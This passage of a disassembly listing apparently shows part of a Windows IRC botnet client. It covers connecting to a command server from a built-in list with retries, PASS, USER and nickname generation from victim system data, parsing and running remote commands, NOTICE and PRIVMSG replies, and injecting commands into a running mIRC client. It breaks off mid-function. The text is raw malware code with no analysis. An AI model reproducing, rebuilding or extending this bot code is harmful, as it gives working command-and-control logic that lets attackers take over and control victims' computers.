loc_4083A1: ; CODE XREF: sub_40735A+A10�j
; sub_40735A+A1C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1BC]
push eax
call sub_4018D5
loc_4083B3: ; CODE XREF: sub_40735A+B3�j
; sub_40735A+2A6�j ...
pop ecx
jmp short loc_4083ED
; ---------------------------------------------------------------------------
loc_4083B6: ; CODE XREF: sub_40735A+957�j
; sub_40735A+963�j ...
push offset aQuitExitting ; "QUIT :exitting"
loc_4083BB: ; CODE XREF: sub_40735A+8C7�j
call sub_408E60
jmp short loc_4083ED
; ---------------------------------------------------------------------------
loc_4083C2: ; CODE XREF: sub_40735A+4BA�j
; sub_40735A+4C6�j ...
push dword ptr [esi+14h]
lea eax, [ebp+var_1BC]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
push eax
call sub_40E629
jmp loc_4078BA
; ---------------------------------------------------------------------------
loc_4083E2: ; CODE XREF: sub_40735A+357�j
; sub_40735A+363�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_408EC8
loc_4083ED: ; CODE XREF: sub_40735A+71�j
; sub_40735A+2BF�j ...
pop ecx
loc_4083EE: ; CODE XREF: sub_40735A+E7�j
; sub_40735A+133�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40735A endp
; =============== S U B R O U T I N E =======================================
sub_4083F3 proc near ; CODE XREF: sub_40849F+320�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_4083F7: ; CODE XREF: sub_4083F3+10�j
mov cl, [eax]
cmp cl, 20h
jnz short locret_408405
test cl, cl
jz short locret_408405
inc eax
jmp short loc_4083F7
; ---------------------------------------------------------------------------
locret_408405: ; CODE XREF: sub_4083F3+9�j
; sub_4083F3+D�j
retn
sub_4083F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408406 proc near ; DATA XREF: sub_4087CE+4E�o
var_52C = byte ptr -52Ch
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_187 = byte ptr -187h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 52Ch
push esi
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_4]
mov esi, offset asc_413DEC ; ";"
push eax
lea eax, [ebp+var_328]
push esi
push eax
call sub_405733
add esp, 1Ch
loc_408445: ; CODE XREF: sub_408406+84�j
test eax, eax
jz short loc_40848C
loc_408449: ; CODE XREF: sub_408406+49�j
cmp byte ptr [eax], 20h
jnz short loc_408451
inc eax
jmp short loc_408449
; ---------------------------------------------------------------------------
loc_408451: ; CODE XREF: sub_408406+46�j
push eax
lea eax, [ebp+var_187]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
lea eax, [ebp+var_52C]
push 200h
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_52C]
push eax
call sub_4098BB
lea eax, [ebp+var_4]
push eax
push esi
push 0
call sub_405733
add esp, 24h
jmp short loc_408445
; ---------------------------------------------------------------------------
loc_40848C: ; CODE XREF: sub_408406+41�j
push [ebp+var_32C]
call sub_406753
pop ecx
xor eax, eax
pop esi
leave
retn 4
sub_408406 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40849F proc near ; CODE XREF: sub_4087CE+6�p
var_1D4 = byte ptr -1D4h
var_54 = byte ptr -54h
var_34 = byte ptr -34h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1D4h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
test esi, esi
jz loc_4087C7
cmp byte ptr [esi], 28h
jnz loc_4087C7
inc esi
push offset asc_413E54 ; ")"
push esi
call sub_410898 ; strstr
pop ecx
mov [ebp+var_4], eax
test eax, eax
pop ecx
jz loc_4087C7
sub eax, esi
lea ecx, [eax+1]
mov eax, 180h
cmp ecx, eax
ja short loc_4084E8
mov eax, ecx
loc_4084E8: ; CODE XREF: sub_40849F+45�j
push eax
lea eax, [ebp+var_1D4]
push esi
push eax
call sub_4052A6
push 1
lea eax, [ebp+var_1D4]
push 1
push eax
call sub_4053BA
lea eax, [ebp+arg_0]
mov ebx, offset asc_413E50 ; "&&"
push eax
lea eax, [ebp+var_1D4]
push ebx
push eax
call sub_405733
add esp, 24h
loc_40851F: ; CODE XREF: sub_40849F+316�j
test eax, eax
jz loc_4087BA
loc_408527: ; CODE XREF: sub_40849F+8E�j
cmp byte ptr [eax], 20h
jnz short loc_40852F
inc eax
jmp short loc_408527
; ---------------------------------------------------------------------------
loc_40852F: ; CODE XREF: sub_40849F+8B�j
lea ecx, [ebp+var_54]
push ecx
lea ecx, [ebp+var_14]
push ecx
lea ecx, [ebp+var_34]
push ecx
push offset a32s16s32s ; "%32s %16s %32s"
push eax
call sub_410892 ; sscanf
add esp, 14h
cmp eax, 3
jnz loc_4087C7
lea eax, [ebp+var_34]
push eax
call sub_41088C ; atoi
mov edi, eax
lea eax, [ebp+var_54]
push eax
call sub_41088C ; atoi
pop ecx
mov esi, eax
test edi, edi
pop ecx
jnz loc_40863C
lea eax, [ebp+var_34]
push offset dword_412F1C
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz loc_40863C
lea eax, [ebp+var_34]
push offset aUptime ; "$uptime"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4085B1
call sub_40639B
xor edx, edx
mov ecx, 15180h
div ecx
jmp loc_40863A
; ---------------------------------------------------------------------------
loc_4085B1: ; CODE XREF: sub_40849F+FD�j
lea eax, [ebp+var_34]
push offset aVersion ; "$version"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4085CC
mov edi, 398h
jmp short loc_40863C
; ---------------------------------------------------------------------------
loc_4085CC: ; CODE XREF: sub_40849F+124�j
lea eax, [ebp+var_34]
push offset aFree_0 ; "$free"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4085E7
call sub_406096
jmp short loc_40863A
; ---------------------------------------------------------------------------
loc_4085E7: ; CODE XREF: sub_40849F+13F�j
lea eax, [ebp+var_34]
push offset aLatency ; "$latency"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_408602
call sub_405C57
jmp short loc_40863A
; ---------------------------------------------------------------------------
loc_408602: ; CODE XREF: sub_40849F+15A�j
lea eax, [ebp+var_34]
push offset aFirewall ; "$firewall"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_40861D
call sub_403289
jmp short loc_40863A
; ---------------------------------------------------------------------------
loc_40861D: ; CODE XREF: sub_40849F+175�j
lea eax, [ebp+var_34]
push offset aIpv6 ; "$ipv6"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_4087C7
call sub_4033B0
loc_40863A: ; CODE XREF: sub_40849F+10D�j
; sub_40849F+146�j ...
mov edi, eax
loc_40863C: ; CODE XREF: sub_40849F+CD�j
; sub_40849F+E5�j ...
test esi, esi
jnz loc_40870E
lea eax, [ebp+var_54]
push offset dword_412F1C
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz loc_40870E
lea eax, [ebp+var_54]
push offset aUptime ; "$uptime"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_408683
call sub_40639B
xor edx, edx
mov ecx, 15180h
div ecx
jmp loc_40870C
; ---------------------------------------------------------------------------
loc_408683: ; CODE XREF: sub_40849F+1CF�j
lea eax, [ebp+var_54]
push offset aVersion ; "$version"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_40869E
mov esi, 398h
jmp short loc_40870E
; ---------------------------------------------------------------------------
loc_40869E: ; CODE XREF: sub_40849F+1F6�j
lea eax, [ebp+var_54]
push offset aFree_0 ; "$free"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4086B9
call sub_406096
jmp short loc_40870C
; ---------------------------------------------------------------------------
loc_4086B9: ; CODE XREF: sub_40849F+211�j
lea eax, [ebp+var_54]
push offset aLatency ; "$latency"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4086D4
call sub_405C57
jmp short loc_40870C
; ---------------------------------------------------------------------------
loc_4086D4: ; CODE XREF: sub_40849F+22C�j
lea eax, [ebp+var_54]
push offset aFirewall ; "$firewall"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4086EF
call sub_403289
jmp short loc_40870C
; ---------------------------------------------------------------------------
loc_4086EF: ; CODE XREF: sub_40849F+247�j
lea eax, [ebp+var_54]
push offset aIpv6 ; "$ipv6"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_4087C7
call sub_4033B0
loc_40870C: ; CODE XREF: sub_40849F+1DF�j
; sub_40849F+218�j ...
mov esi, eax
loc_40870E: ; CODE XREF: sub_40849F+19F�j
; sub_40849F+1B7�j ...
lea eax, [ebp+var_14]
push offset asc_413E00 ; "=="
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_40872A
cmp edi, esi
jnz loc_4087C7
loc_40872A: ; CODE XREF: sub_40849F+281�j
lea eax, [ebp+var_14]
push offset asc_413DFC ; "!="
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_408746
cmp edi, esi
jz loc_4087C7
loc_408746: ; CODE XREF: sub_40849F+29D�j
lea eax, [ebp+var_14]
push offset asc_413DF8 ; ">"
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_40875E
cmp edi, esi
jbe short loc_4087C7
loc_40875E: ; CODE XREF: sub_40849F+2B9�j
lea eax, [ebp+var_14]
push offset asc_413DF4 ; ">="
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_408776
cmp edi, esi
jb short loc_4087C7
loc_408776: ; CODE XREF: sub_40849F+2D1�j
lea eax, [ebp+var_14]
push offset dword_41394C
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_40878E
cmp edi, esi
jnb short loc_4087C7
loc_40878E: ; CODE XREF: sub_40849F+2E9�j
lea eax, [ebp+var_14]
push offset asc_413DF0 ; "<="
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz short loc_4087A6
cmp edi, esi
ja short loc_4087C7
loc_4087A6: ; CODE XREF: sub_40849F+301�j
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
call sub_405733
add esp, 0Ch
jmp loc_40851F
; ---------------------------------------------------------------------------
loc_4087BA: ; CODE XREF: sub_40849F+82�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_4083F3
pop ecx
jmp short loc_4087C9
; ---------------------------------------------------------------------------
loc_4087C7: ; CODE XREF: sub_40849F+11�j
; sub_40849F+1A�j ...
xor eax, eax
loc_4087C9: ; CODE XREF: sub_40849F+326�j
pop edi
pop esi
pop ebx
leave
retn
sub_40849F endp
; =============== S U B R O U T I N E =======================================
sub_4087CE proc near ; CODE XREF: sub_40735A+A37�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
push [esp+8+arg_4]
call sub_40849F
mov edi, eax
pop ecx
test edi, edi
jz short loc_408829
push 327h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_408829
push 180h
lea eax, [esi+4]
push edi
push eax
call sub_4052A6
push [esp+14h+arg_0]
lea eax, [esi+184h]
push eax
call sub_403E60
add esp, 14h
push edi
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push esi
push offset sub_408406
call sub_40663C
add esp, 14h
loc_408829: ; CODE XREF: sub_4087CE+10�j
; sub_4087CE+21�j
pop edi
pop esi
retn
sub_4087CE endp
; =============== S U B R O U T I N E =======================================
sub_40882C proc near ; CODE XREF: sub_401B81+77�p
; sub_408F9D+461�p ...
mov eax, dword_4186D4
retn
sub_40882C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408832 proc near ; CODE XREF: sub_408BA7+10�p
; sub_408BA7+6C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_0], ebx
push esi
push edi
mov edi, offset byte_418448
jz short loc_408881
push [ebp+arg_0]
push offset dword_4185C8
call sub_410820 ; _mbscpy
cmp [ebp+arg_4], ebx
pop ecx
pop ecx
jz short loc_40885D
push [ebp+arg_4]
jmp short loc_408862
; ---------------------------------------------------------------------------
loc_40885D: ; CODE XREF: sub_408832+24�j
push offset a6667 ; "6667"
loc_408862: ; CODE XREF: sub_408832+29�j
mov ebx, offset dword_4186C8
push ebx
call sub_410820 ; _mbscpy
cmp [ebp+arg_8], 0
pop ecx
pop ecx
jz short loc_40887A
push [ebp+arg_8]
jmp short loc_4088D6
; ---------------------------------------------------------------------------
loc_40887A: ; CODE XREF: sub_408832+41�j
push offset byte_417B60
jmp short loc_4088D6
; ---------------------------------------------------------------------------
loc_408881: ; CODE XREF: sub_408832+10�j
xor esi, esi
cmp off_4177B8, ebx
jz short loc_408898
mov eax, offset off_4177B8
loc_408890: ; CODE XREF: sub_408832+64�j
add eax, 0Ch
inc esi
cmp [eax], ebx
jnz short loc_408890
loc_408898: ; CODE XREF: sub_408832+57�j
call sub_40AB05
xor edx, edx
div esi
lea esi, [edx+edx*2]
shl esi, 2
push off_4177B8[esi]
push offset dword_4185C8
call sub_410820 ; _mbscpy
push off_4177BC[esi]
mov ebx, offset dword_4186C8
push ebx
call sub_410820 ; _mbscpy
mov esi, off_4177C0[esi]
add esp, 10h
test esi, esi
jz short loc_4088DE
push esi
loc_4088D6: ; CODE XREF: sub_408832+46�j
; sub_408832+4D�j
push edi
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_4088DE: ; CODE XREF: sub_408832+A1�j
push offset dword_4185C8
call sub_40AC15
push ebx
call sub_40AC15
push edi
call sub_40AC15
add esp, 0Ch
pop edi
pop esi
pop ebx
pop ebp
retn
sub_408832 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: sub_408BA7+B9�p
; sub_408F9D+4BF�p
var_238 = byte ptr -238h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 238h
lea eax, [ebp+var_238]
push esi
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_A0]
push eax
call sub_404354
add esp, 0Ch
cmp byte_418448, 0
jz short loc_40894C
mov esi, offset byte_418448
push esi
call sub_40AC4E
pop ecx
push esi
push offset aPassS ; "PASS %s"
call sub_408E60
push esi
call sub_40AC15
add esp, 0Ch
loc_40894C: ; CODE XREF: sub_4088FC+2E�j
xor esi, esi
cmp [ebp+arg_0], esi
jz short loc_4089D0
cmp byte_418BF8, 0
jz short loc_40896A
lea eax, [ebp+var_120]
push offset byte_418BF8
push eax
jmp short loc_408976
; ---------------------------------------------------------------------------
loc_40896A: ; CODE XREF: sub_4088FC+5E�j
lea eax, [ebp+var_120]
push eax
push offset byte_418BF8
loc_408976: ; CODE XREF: sub_4088FC+6C�j
call sub_410820 ; _mbscpy
cmp byte_418D78, 0
pop ecx
pop ecx
jz short loc_408994
lea eax, [ebp+var_238]
push offset byte_418D78
push eax
jmp short loc_4089A0
; ---------------------------------------------------------------------------
loc_408994: ; CODE XREF: sub_4088FC+88�j
lea eax, [ebp+var_238]
push eax
push offset byte_418D78
loc_4089A0: ; CODE XREF: sub_4088FC+96�j
call sub_410820 ; _mbscpy
pop ecx
lea eax, [ebp+var_238]
pop ecx
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_120]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_408E60
add esp, 14h
loc_4089D0: ; CODE XREF: sub_4088FC+55�j
cmp [ebp+arg_4], esi
jz loc_408BA4
cmp [ebp+arg_0], esi
jz short loc_4089FD
cmp byte_418B78, 0
jz short loc_4089FD
push offset byte_418B78
push offset dword_413DA8
call sub_408E60
pop ecx
pop ecx
jmp loc_408BA4
; ---------------------------------------------------------------------------
loc_4089FD: ; CODE XREF: sub_4088FC+E0�j
; sub_4088FC+E9�j
call sub_40639B
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, 4
mov [ebp+arg_4], eax
jnb short loc_408A4D
call sub_404691
test eax, eax
jnz short loc_408A4D
lea eax, [ebp+var_A0]
push offset loc_4177DC
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_A0]
push eax
call sub_40AC4E
lea eax, [ebp+var_A0]
push eax
call sub_408F4C
add esp, 10h
jmp loc_408B7F
; ---------------------------------------------------------------------------
loc_408A4D: ; CODE XREF: sub_4088FC+115�j
; sub_4088FC+11E�j
call sub_4045E4
lea eax, [ebp+var_20]
push eax
call sub_40587E
test eax, eax
pop ecx
jnz short loc_408A70
lea eax, [ebp+var_20]
push offset aUnk ; "UNK"
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_408A70: ; CODE XREF: sub_4088FC+162�j
call sub_406096
mov ecx, 400h
cmp eax, ecx
jbe short loc_408A85
call sub_406096
jmp short loc_408A87
; ---------------------------------------------------------------------------
loc_408A85: ; CODE XREF: sub_4088FC+180�j
mov eax, ecx
loc_408A87: ; CODE XREF: sub_4088FC+187�j
shr eax, 0Ah
push ebx
mov [ebp+arg_0], eax
call sub_405C57
cmp eax, 2EEh
mov ebx, offset aB ; "B"
jnb short loc_408AA4
mov ebx, offset aA ; "A"
loc_408AA4: ; CODE XREF: sub_4088FC+1A1�j
cmp eax, 1F4h
jnb short loc_408AB0
mov ebx, offset aG ; "G"
loc_408AB0: ; CODE XREF: sub_4088FC+1AD�j
push edi
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_1B0]
mov [ebp+var_1B4], 94h
rep stosd
lea eax, [ebp+var_1B4]
push eax
call ds:dword_411034 ; GetVersionExA
cmp [ebp+var_1B0], 5
pop edi
jnz short loc_408AEB
cmp [ebp+var_1AC], 1
jnz short loc_408AEB
push 1
pop esi
loc_408AEB: ; CODE XREF: sub_4088FC+1E1�j
; sub_4088FC+1EA�j
push 5Ah
push 41h
call sub_40AADE
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_40AADE
pop ecx
pop ecx
test esi, esi
push eax
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_20]
push 5Dh
push [ebp+arg_4]
push 5Bh
push 5Dh
push eax
push 5Bh
lea eax, [ebp+var_A0]
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
push eax
call sub_410844 ; sprintf
add esp, 34h
cmp byte_41786C, 0
pop ebx
jz short loc_408B7F
mov esi, offset dword_4177EC
push offset byte_41786C
push esi
call sub_410820 ; _mbscpy
push esi
call sub_40AC4E
add esp, 0Ch
cmp byte_4178EC, 0
jz short loc_408B7F
mov esi, offset dword_418A78
push offset byte_4178EC
push esi
call sub_410820 ; _mbscpy
push esi
call sub_40AC4E
add esp, 0Ch
loc_408B7F: ; CODE XREF: sub_4088FC+14C�j
; sub_4088FC+246�j ...
lea eax, [ebp+var_A0]
push eax
push offset dword_413DA8
call sub_408E60
lea eax, [ebp+var_A0]
push eax
push offset byte_418B78
call sub_410820 ; _mbscpy
add esp, 10h
loc_408BA4: ; CODE XREF: sub_4088FC+D7�j
; sub_4088FC+FC�j
pop esi
leave
retn
sub_4088FC endp
; =============== S U B R O U T I N E =======================================
sub_408BA7 proc near ; CODE XREF: sub_40735A+103D�p
; sub_408F9D+3B8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push ebp
push esi
push edi
push [esp+10h+arg_8]
push [esp+14h+arg_4]
push [esp+18h+arg_0]
call sub_408832
push dword_4186D4
call sub_403D27
mov edi, offset dword_4185C8
mov ebp, 0EA60h
push edi
call sub_40AC4E
mov esi, offset dword_4186C8
push esi
call sub_40AC4E
mov ebx, 2710h
push ebx
push 1
push esi
push edi
call sub_403BBB
push edi
mov dword_4186D4, eax
call sub_40AC15
push esi
call sub_40AC15
add esp, 30h
loc_408C05: ; CODE XREF: sub_408BA7+B3�j
cmp dword_4186D4, 0
jnz short loc_408C5C
xor eax, eax
push eax
push eax
push eax
call sub_408832
add esp, 0Ch
push ebp
call ds:dword_4110A4 ; Sleep
cmp ebp, 0A4CB80h
jge short loc_408C30
add ebp, 0EA60h
loc_408C30: ; CODE XREF: sub_408BA7+81�j
push edi
call sub_40AC4E
push esi
call sub_40AC4E
push ebx
push 1
push esi
push edi
call sub_403BBB
push edi
mov dword_4186D4, eax
call sub_40AC15
push esi
call sub_40AC15
add esp, 20h
jmp short loc_408C05
; ---------------------------------------------------------------------------
loc_408C5C: ; CODE XREF: sub_408BA7+65�j
push 1
push 1
call sub_4088FC
pop ecx
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_408BA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C6C proc near ; CODE XREF: sub_401B81+14D�p
; sub_40735A+8A6�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4108B0
push [ebp+arg_0]
lea eax, [ebp+var_1000]
push offset aNoticeS ; "NOTICE %s :"
push eax
call sub_410844 ; sprintf
lea ecx, [ebp+arg_8]
push ecx
mov ecx, 1000h
push [ebp+arg_4]
sub ecx, eax
lea eax, [ebp+eax+var_1000]
push ecx
push eax
call sub_410B00 ; _vsnprintf
lea eax, [ebp+var_1000]
push offset asc_412214 ; "\r\n"
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_1000]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_1000]
push eax
push dword_4186D4
call sub_403D54
add esp, 34h
leave
retn
sub_408C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408CDE proc near ; CODE XREF: sub_401B81+184�p
; sub_40287C+10E�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4108B0
push [ebp+arg_0]
lea eax, [ebp+var_1000]
push offset aPrivmsgS ; "PRIVMSG %s :"
push eax
call sub_410844 ; sprintf
lea ecx, [ebp+arg_8]
push ecx
mov ecx, 1000h
push [ebp+arg_4]
sub ecx, eax
lea eax, [ebp+eax+var_1000]
push ecx
push eax
call sub_410B00 ; _vsnprintf
lea eax, [ebp+var_1000]
push offset asc_412214 ; "\r\n"
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_1000]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_1000]
push eax
push dword_4186D4
call sub_403D54
add esp, 34h
leave
retn
sub_408CDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D50 proc near ; CODE XREF: sub_4011C4+4C�p
; sub_4011C4+21B�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4108B0
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+198h], 0
jnz loc_408E5D
mov eax, [esi+121h]
push edi
cmp eax, 1
jnz short loc_408D85
lea eax, [esi+21h]
push eax
push offset aNoticeS ; "NOTICE %s :"
jmp short loc_408DAA
; ---------------------------------------------------------------------------
loc_408D85: ; CODE XREF: sub_408D50+28�j
cmp eax, 2
jnz short loc_408D95
lea eax, [esi+21h]
push eax
push offset dword_413EFC
jmp short loc_408DAA
; ---------------------------------------------------------------------------
loc_408D95: ; CODE XREF: sub_408D50+38�j
cmp eax, 3
lea eax, [esi+21h]
push eax
jnz short loc_408DA5
push offset dword_413EEC
jmp short loc_408DAA
; ---------------------------------------------------------------------------
loc_408DA5: ; CODE XREF: sub_408D50+4C�j
push offset aPrivmsgS ; "PRIVMSG %s :"
loc_408DAA: ; CODE XREF: sub_408D50+33�j
; sub_408D50+43�j ...
lea eax, [ebp+var_1000]
push eax
call sub_410844 ; sprintf
add esp, 0Ch
cmp dword ptr [esi+19Fh], 0
mov edi, eax
jz short loc_408DE7
mov eax, [esi+121h]
cmp eax, 2
jz short loc_408DD4
cmp eax, 3
jnz short loc_408DE7
loc_408DD4: ; CODE XREF: sub_408D50+7D�j
lea eax, [ebp+var_1000]
push offset dword_413EE0
push eax
call sub_410856 ; _mbscat
pop ecx
pop ecx
loc_408DE7: ; CODE XREF: sub_408D50+72�j
; sub_408D50+82�j
lea eax, [ebp+arg_8]
push eax
mov eax, 1000h
push [ebp+arg_4]
sub eax, edi
push eax
lea eax, [ebp+edi+var_1000]
push eax
call sub_410B00 ; _vsnprintf
mov esi, [esi+121h]
add esp, 10h
cmp esi, 2
pop edi
jz short loc_408E17
cmp esi, 3
jnz short loc_408E2A
loc_408E17: ; CODE XREF: sub_408D50+C0�j
lea eax, [ebp+var_1000]
push offset dword_413EDC
push eax
call sub_410856 ; _mbscat
pop ecx
pop ecx
loc_408E2A: ; CODE XREF: sub_408D50+C5�j
lea eax, [ebp+var_1000]
push offset asc_412214 ; "\r\n"
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_1000]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_1000]
push eax
push dword_4186D4
call sub_403D54
add esp, 18h
loc_408E5D: ; CODE XREF: sub_408D50+18�j
pop esi
leave
retn
sub_408D50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E60 proc near ; CODE XREF: sub_40287C:loc_402A05�p
; sub_404BC3+D8�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4108B0
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_1000]
push [ebp+arg_0]
push 1000h
push eax
call sub_410B00 ; _vsnprintf
lea eax, [ebp+var_1000]
push offset asc_412214 ; "\r\n"
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_1000]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_1000]
push eax
push dword_4186D4
call sub_403D54
add esp, 28h
leave
retn
sub_408E60 endp
; =============== S U B R O U T I N E =======================================
sub_408EBA proc near ; CODE XREF: sub_408EC8+B�p
push 0
push offset aMirc ; "mIRC"
call ds:dword_4111F8 ; FindWindowA
retn
sub_408EBA endp
; =============== S U B R O U T I N E =======================================
sub_408EC8 proc near ; CODE XREF: sub_40735A+108E�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push esi
push edi
xor edi, edi
cmp [esp+0Ch+arg_0], edi
jz short loc_408F48
call sub_408EBA
mov esi, eax
cmp esi, edi
mov [esp+0Ch+var_4], esi
jz short loc_408F48
push ebx
push ebp
push offset aMirc ; "mIRC"
push 1000h
push edi
push 4
push edi
push 0FFFFFFFFh
call ds:dword_4110C8 ; CreateFileMappingA
push edi
push edi
mov ebx, eax
push edi
push 0F001Fh
push ebx
call ds:dword_4110C4 ; MapViewOfFile
push [esp+14h+arg_0]
mov ebp, eax
push ebp
call sub_410844 ; sprintf
pop ecx
pop ecx
push edi
push 1
push 4C8h
push esi
mov esi, ds:dword_4111FC
call esi ; SendMessageA
push edi
push 1
push 4C9h
push [esp+20h+var_4]
call esi ; SendMessageA
push ebp
call ds:dword_4110C0 ; UnmapViewOfFile
push ebx
call ds:dword_4110AC ; CloseHandle
pop ebp
pop ebx
loc_408F48: ; CODE XREF: sub_408EC8+9�j
; sub_408EC8+18�j
pop edi
pop esi
pop ecx
retn
sub_408EC8 endp
; =============== S U B R O U T I N E =======================================
sub_408F4C proc near ; CODE XREF: sub_40735A+B9�p
; sub_4088FC+144�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push ebp
push edi
push ebx
call sub_410826 ; strlen
mov ebp, eax
xor edi, edi
test ebp, ebp
pop ecx
jle short loc_408F99
push esi
loc_408F63: ; CODE XREF: sub_408F4C+4A�j
mov al, [edi+ebx]
lea esi, [edi+ebx]
cmp al, 23h
jnz short loc_408F73
push 39h
push 30h
jmp short loc_408F8A
; ---------------------------------------------------------------------------
loc_408F73: ; CODE XREF: sub_408F4C+1F�j
cmp al, 3Fh
jnz short loc_408F93
call sub_40AB30
test eax, eax
jz short loc_408F86
push 7Ah
push 61h
jmp short loc_408F8A
; ---------------------------------------------------------------------------
loc_408F86: ; CODE XREF: sub_408F4C+32�j
push 5Ah
push 41h
loc_408F8A: ; CODE XREF: sub_408F4C+25�j
; sub_408F4C+38�j
call sub_40AADE
pop ecx
mov [esi], al
pop ecx
loc_408F93: ; CODE XREF: sub_408F4C+29�j
inc edi
cmp edi, ebp
jl short loc_408F63
pop esi
loc_408F99: ; CODE XREF: sub_408F4C+14�j
pop edi
pop ebp
